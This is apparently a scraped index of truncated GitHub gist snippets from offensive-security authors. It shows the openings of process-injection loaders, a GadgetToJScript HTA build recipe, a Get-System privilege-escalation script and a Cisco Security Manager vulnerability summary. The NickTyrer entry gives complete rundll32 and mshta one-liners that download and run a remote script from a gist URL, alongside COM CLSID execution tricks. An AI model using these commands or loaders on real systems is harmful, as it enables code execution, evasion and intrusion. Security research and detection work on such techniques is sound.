MHaggis

{
    "Powershell": {
        "process_name": ["powershell.exe"]
    },
    "Utilman": {
        "process_name": ["utilman.exe"]
    },
    "msiexec": {
        "process_name": ["msiexec.exe"]
    },

med0x2e

Steps:

1- apt-get install mono-complete     
2- apt-get install wine winetricks -y
3- winetricks dotnet35  
4- winetricks dotnet48 
5- dpkg --add-architecture i386 && apt-get update && apt-get install wine32
6- rm -Rf ~/.wine
7- WINEPREFIX=~/.wine32 WINEARCH=win32 wineboot
8- wine GadgetToJScript.NET3.5.exe -r -c helloworld.cs -d System.Windows.Forms.dll -w hta -o hello

ChoiSG

using System;
using DInvoke;
using System.Diagnostics;
using System.Runtime.InteropServices;
using DynamicInvoke = DInvoke.DynamicInvoke;
using Data = DInvoke.Data;

namespace dinvokeSyscall
{
    class Program

rvrsh3ll

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace DinjectorWithQUserAPC
{


    public class Program

milo2012

function Get-System {
<#
.SYNOPSIS

GetSystem functionality inspired by Meterpreter's getsystem.

Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  
License: BSD 3-Clause  
Required Dependencies: PSReflect  

rvrsh3ll

using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;

public class Payload
{
    public Payload()

sammbertram

var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" );
actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest";
try
{
	var DX = actCtx.CreateObject("DynamicWrapperX");
	DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l");  // Register a dll function.
	res = DX.MessageBoxW(0, "Hello, world!", "Test", 4);        // Call the function.
}
catch(e){ WScript.Echo("Fail");}

NickTyrer

xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();

Frycos

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

rvrsh3ll

using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;

    public class Payload
    {